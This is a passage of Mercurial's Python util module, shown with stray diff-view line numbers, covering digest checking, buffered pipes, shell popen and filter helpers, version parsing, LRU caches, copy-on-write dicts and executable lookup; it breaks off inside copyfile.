    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206 206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 207
def nouideprecwarn(msg, version, stacklevel=1):
    """Emit a native Python DeprecationWarning.

    Nothing happens unless ``_dowarn`` is set (i.e. outside of tests this
    is a noop); prefer 'ui.deprecwarn' whenever a ui object is available.

    ``version`` is interpolated into the notice appended to ``msg``.
    ``stacklevel`` is increased by one before being handed to
    warnings.warn() to account for this wrapper's own frame.
    """
    if not _dowarn:
        return
    notice = ("\n(compatibility will be dropped after Mercurial-%s,"
              " update your code.)") % version
    warnings.warn(msg + notice, DeprecationWarning, stacklevel + 1)
217 217
# Supported digest names mapped to their hashlib constructors.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# Sanity check: every ranked digest must have a constructor.
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        """Create one hash object per name in ``digests``.

        Raises Abort for a name missing from DIGESTS. If ``s`` is non-empty
        it is fed to every hash right away.
        """
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every hash being computed."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for digest type ``key``.

        Raises Abort when ``key`` is not a known digest type.
        """
        if key not in DIGESTS:
            # Report the offending key itself; the previous code formatted
            # an unrelated name left over from the module-level loop.
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        """Iterate over the names of the digests being computed."""
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
275 275
class digestchecker(object):
    """file handle wrapper that also verifies size and digests of the data
    read through it.

    d = digestchecker(fh, size, {'md5': '...'})

    Every digest supplied is checked by validate(); a single mismatch is
    enough to fail.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, updating digests and byte count."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Raise Abort if the size or any digest differs from expectations."""
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, actual))
307 307
# Keep the interpreter's own ``buffer`` when it exists; when the name is
# missing (NameError), define a memoryview-based stand-in.
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        """Return a memoryview of ``sliceable`` starting at ``offset``.

        When ``length`` is given the view covers at most ``length`` items;
        otherwise it runs to the end of ``sliceable``.
        """
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]
315 315
# Value passed as ``close_fds`` to the subprocess calls in this module.
# NOTE(review): the first assignment is immediately overridden by the
# second; it looks like the pre-change line of this changeset -- confirm
# and drop it.
closefds = pycompat.osname == 'posix'
closefds = pycompat.isposix

# Number of bytes requested per os.read() call by bufferedinputpipe.
_chunksize = 4096
319 319
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us combine buffered IO and lazy reading with
    'polling': the buffer state cannot be probed, and select will not report
    data as ready to read once it already sits in a buffer.

    This class works around that by doing its own buffering (which keeps
    readline efficient) while exposing whether the buffer is empty, so that
    callers can coordinate the buffer with polling.

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input
        self._buffer = []   # list of chunks read but not yet returned
        self._eof = False   # set once os.read() returned no data
        self._lenbuf = 0    # total length of the chunks in _buffer

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This is meant to be checked externally as a pre-step for polling
        IO. If data is already buffered, no polling should be set up."""
        return len(self._buffer) != 0

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to ``size`` data, filling the buffer until enough is
        available or end of file is reached."""
        while not (self._eof or self._lenbuf >= size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        """Return data up to and including the next newline, or whatever is
        left when end of file is reached first."""
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        newline = -1
        if self._buffer:
            newline = self._buffer[-1].find('\n')
        # only the most recent chunk needs scanning: older ones were
        # already searched without success
        while newline < 0 and not self._eof:
            self._fillbuffer()
            if self._buffer:
                newline = self._buffer[-1].find('\n')
        if newline < 0: # end of file
            wanted = self._lenbuf
        else:
            wanted = newline + 1
            if len(self._buffer) > 1:
                # we need to take previous chunks into account
                wanted += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(wanted)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        if len(self._buffer) > 1:
            pending = ''.join(self._buffer)
        else:
            pending = self._buffer[0]

        data = pending[:size]
        rest = pending[len(data):]
        self._buffer = [rest] if rest else []
        self._lenbuf = len(rest)
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if data:
            self._lenbuf += len(data)
            self._buffer.append(data)
        else:
            self._eof = True
413 413
def mmapread(fp):
    """Return a read-only mmap of ``fp``, or '' if the file is empty.

    ``fp`` is either an object with a fileno() method or something usable
    as a file descriptor directly. A ValueError raised by mmap for any
    reason other than an empty file is propagated.
    """
    # Resolve the descriptor before entering the try block: fileno() can
    # itself raise ValueError (e.g. closed file), and the handler below
    # needs ``fd`` to be bound.
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
424 424
def popen2(cmd, env=None, newlines=False):
    """Run ``cmd`` through the shell and return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(
        cmd,
        shell=True,
        bufsize=-1,
        close_fds=closefds,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        universal_newlines=newlines,
        env=env)
    return proc.stdin, proc.stdout
435 435
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but return only the (stdin, stdout, stderr) pipes."""
    pipes = popen4(cmd, env, newlines)
    stdin, stdout, stderr, _proc = pipes
    return stdin, stdout, stderr
439 439
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run ``cmd`` through the shell with stdin, stdout and stderr piped.

    Returns a (stdin, stdout, stderr, process) tuple.
    """
    proc = subprocess.Popen(
        cmd,
        shell=True,
        bufsize=bufsize,
        close_fds=closefds,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=newlines,
        env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
448 448
def version():
    """Return version information if available.

    Falls back to 'unknown' when the ``__version__`` module cannot be
    imported.
    """
    try:
        from . import __version__ as versionmod
    except ImportError:
        return 'unknown'
    return versionmod.version
456 456
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    Any other value of ``n`` falls through and returns None.
    """
    if not v:
        v = version()
    # Split once on the first '+' or '-'. Inside a character class '+'
    # needs no backslash, which avoids an invalid '\+' escape in a
    # non-raw string literal.
    parts = remod.split('[+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    # Collect leading integer components; stop at the first non-integer.
    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
525 525
# used by parsedate
# strftime/strptime-style format strings, listed as a tuple.
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    #   without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     #   without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    #   without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     #   without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',    # NOTE(review): duplicates an entry a few lines up
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

# The default formats plus coarser year/month-only formats.
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
567 567
def cachefunc(func):
    '''cache the result of function calls

    The wrapper is chosen from the number of positional arguments that
    ``func`` declares: none, exactly one, or anything else (keyed on the
    whole argument tuple).'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # a one-element list is enough to remember the single result
        results = []
        def f():
            if not results:
                results.append(func())
            return results[0]
        return f

    results = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg in results:
                return results[arg]
            value = results[arg] = func(arg)
            return value
    else:
        def f(*args):
            if args in results:
                return results[args]
            value = results[args] = func(*args)
            return value

    return f
593 593
class cow(object):
    """mixin providing copy-on-write behaviour

    copy() hands out the same object and only counts the outstanding
    copies; preparewrite() must be called before any write and performs the
    real copy when one is still owed.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        outstanding = getattr(self, '_copied', 0)
        if not outstanding:
            return self
        self._copied = outstanding - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = 1 + getattr(self, '_copied', 0)
        return self
611 611
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Delete an existing entry first so that re-setting a key moves it
        # to the end of the ordering.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            pairs = src.iteritems() if isinstance(src, dict) else src
            for key, value in pairs:
                self[key] = value
636 636
class cowdict(cow, dict):
    """copy-on-write dict

    Combines the ``cow`` mixin with the builtin dict; the class adds no
    members of its own.

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
662 662
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Combines the ``cow`` mixin with ``sortdict``; the class adds no members
    of its own.

    Be sure to call d = d.preparewrite() before writing to d.
    """
668 668
class transactional(object):
    """Base class for making a transactional type into a context manager.

    Leaving the ``with`` block calls close() only when the body raised no
    exception, and calls release() in every case.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            # runs even when close() itself raises
            self.release()
693 693
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    The transaction is also closed when the body finishes normally, and it
    is released in every case. Without a transaction the body is simply
    run.
    """
    if tr:
        try:
            yield
            tr.close()
        except error.InterventionRequired:
            tr.close()
            raise
        finally:
            tr.release()
    else:
        yield
711 711
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on entry or exit."""
    yield
715 715
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.

    A node whose ``key`` is the ``_notset`` sentinel is considered empty.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # neighbours are wired up by the owner of the list
        self.next = None
        self.prev = None

        # a fresh node starts out empty
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        # only the key is reset; ``value`` is left as it was
        self.key = _notset
734 734
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Empty nodes (key is ``_notset``) sit at the old end of the list, i.e.
    just before the head.
    """
    def __init__(self, max):
        """Create an empty cache holding at most ``max`` entries."""
        self._cache = {}

        # The list starts as a single empty node linked to itself.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        """Return the value for ``k`` and mark it as most recently used."""
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        """Store ``v`` under ``k`` as the newest entry, evicting the oldest
        entry when the cache is at capacity."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        """Remove ``k``; its node is kept in the list for reuse."""
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the value for ``k`` or ``default``.

        Unlike __getitem__, this does not change the recency order.
        """
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        """Drop every entry while keeping the allocated nodes."""
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new lrucachedict with the same capacity, entries and
        recency order."""
        result = lrucachedict(self._capacity)

        # Start from the oldest node, skipping the empty nodes that sit at
        # the old end of the list when the cache is not full or entries were
        # deleted. Copying those would insert a bogus ``_notset`` key and
        # leave out the newest real entries.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
893 893
def lrucachefunc(func):
    '''cache most recent results of function calls

    Results are remembered per argument (or per argument tuple when ``func``
    does not take exactly one positional argument). Once more than 20
    results are held, the least recently used one is dropped before a new
    result is stored.'''
    cache = {}
    order = collections.deque()  # keys, least recently used first
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in cache:
                # hit: forget the old position, re-appended below
                order.remove(arg)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
920 920
class propertycache(object):
    """Descriptor that computes a value on access and stores it on the
    instance under the wrapped function's name."""

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
933 933
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output

    CMD is run through the shell with S written to its stdin; only what it
    writes to stdout is returned.'''
    proc = subprocess.Popen(
        cmd,
        shell=True,
        close_fds=closefds,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE)
    output, _unused = proc.communicate(s)
    return output
940 940
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.

    Returns the content of the output file. Raises Abort if the command
    exits with a failure status. Both temporary files are removed
    afterwards on a best-effort basis.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        # ``with`` guarantees the handle is closed even if write() fails
        with os.fdopen(infd, pycompat.sysstr('wb')) as fp:
            fp.write(s)
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        # only the name is needed; the command writes the file itself
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # on OpenVMS a status with the low bit set is treated as success
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup: a failed unlink must not mask the result
        for name in (inname, outname):
            try:
                if name:
                    os.unlink(name)
            except OSError:
                pass
974 974
# Maps a command prefix to the function implementing that filtering mode;
# consulted by filter() below.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
979 979
def filter(s, cmd):
    """filter a string through a command that transforms its input to its
    output

    A prefix of ``cmd`` listed in ``filtertable`` selects the filtering
    function; the prefix and any whitespace after it are removed from the
    command. Without a known prefix, pipefilter is used.
    """
    for prefix, handler in filtertable.iteritems():
        if not cmd.startswith(prefix):
            continue
        realcmd = cmd[len(prefix):].lstrip()
        return handler(s, realcmd)
    return pipefilter(s, cmd)
986 986
def binary(s):
    """return true if a string is binary data

    A string counts as binary when it contains a NUL character; empty or
    None input is never binary.
    """
    if not s:
        return False
    return '\0' in s
990 990
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max

    ``source`` is an iterable of strings; whatever is still pending when it
    is exhausted is yielded as a final, possibly shorter, chunk.'''
    def log2(x):
        # index of the highest set bit; 0 for an input of 0
        return x.bit_length() - 1 if x else 0

    pending = []
    pendinglen = 0
    for chunk in source:
        pending.append(chunk)
        pendinglen += len(chunk)
        if pendinglen < min:
            continue
        if min < max:
            # at least double the threshold, jump further if this chunk
            # was much larger, and never go beyond max
            min = min << 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        yield ''.join(pending)
1021 1021
# Module-level alias so code in this module can raise Abort directly.
Abort = error.Abort
1023 1023
def always(fn):
    """Return True whatever ``fn`` is."""
    return True
1026 1026
def never(fn):
    """Return False whatever ``fn`` is."""
    return False
1029 1029
def nogc(func):
    """disable garbage collector

    Decorator running ``func`` with the garbage collector switched off and
    re-enabling it afterwards if it was enabled before the call.

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # leave the collector off if the caller had it off already
            if wasenabled:
                gc.enable()
    return wrapper
1052 1052
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    # so replace the decorator with one that returns the function unchanged
    nogc = lambda x: x
1056 1056
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # different drives: no relative path exists, answer from root
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    src, dst = splitpath(n1), n2.split('/')
    # length of the leading run of components shared by both paths
    common = 0
    while (common < len(src) and common < len(dst)
           and src[common] == dst[common]):
        common += 1
    climb = ['..'] * (len(src) - common)
    return pycompat.ossep.join(climb + dst[common:]) or '.'
1082 1082
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    if safehasattr(sys, "frozen"): # new py2exe
        return True
    if safehasattr(sys, "importers"): # old py2exe
        return True
    return imp.is_frozen(u"__main__") # tools/freeze
1092 1092
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    # otherwise use the directory containing this module
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# hand the computed directory to the i18n module
i18n.setdatapath(datapath)

# Cached path of the 'hg' executable; filled in lazily by hgexecutable()
# through _sethgexecutable().
_hgexecutable = None
1103 1103
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The answer is computed on the first call and remembered in the
    module-level ``_hgexecutable``.
    """
    if _hgexecutable is not None:
        return _hgexecutable

    hg = encoding.environ.get('HG')
    mainmod = sys.modules[pycompat.sysstr('__main__')]
    if hg:
        path = hg
    elif mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            path = encoding.environ['EXECUTABLEPATH']
        else:
            path = pycompat.sysexecutable
    elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
        # the running main script is itself named 'hg'
        path = pycompat.fsencode(mainmod.__file__)
    else:
        path = findexe('hg') or os.path.basename(sys.argv[0])
    _sethgexecutable(path)
    return _hgexecutable
1127 1127
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # stored in the module-level cache read by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1132 1132
1133 1133 def _isstdout(f):
1134 1134 fileno = getattr(f, 'fileno', None)
1135 1135 return fileno and fileno() == sys.__stdout__.fileno()
1136 1136
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out

    The result is a copy of encoding.environ updated with ``environ`` (its
    values converted to shell-friendly strings), with 'HG' set to the
    location of the hg executable.
    """
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return str(val)

    env = dict(encoding.environ)
    if environ:
        for key, value in environ.iteritems():
            env[key] = py2shell(value)
    env['HG'] = hgexecutable()
    return env
1151 1151
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.

    Returns the command's exit status.'''
    # flush our own pending output first; a failure here is not fatal
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    direct = out is None or _isstdout(out)
    if direct:
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        # forward the merged output line by line until readline() hits EOF
        readline = proc.stdout.readline
        while True:
            line = readline()
            if line == '':
                break
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # on OpenVMS a status with the low bit set is treated as success
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1178 1178
def checksignature(func):
    '''wrap a function with code to check for calling errors

    A TypeError whose traceback is a single frame deep (raised by the call
    itself rather than from inside ``func``) is turned into
    error.SignatureError; any other TypeError is re-raised untouched.'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            depth = len(traceback.extract_tb(sys.exc_info()[2]))
            if depth != 1:
                raise
            raise error.SignatureError

    return check
1190 1190
# a whitelist of known filesystems where hardlink works reliably
# (consulted by copyfile() before attempting a hardlink)
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1205 1205
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.

    An existing dest is removed first. When hardlink is requested and the
    destination filesystem is whitelisted, a hardlink is tried before
    falling back to a real copy. shutil.Error is converted to Abort.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the stat of the file being replaced for the
            # ambiguity check below
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
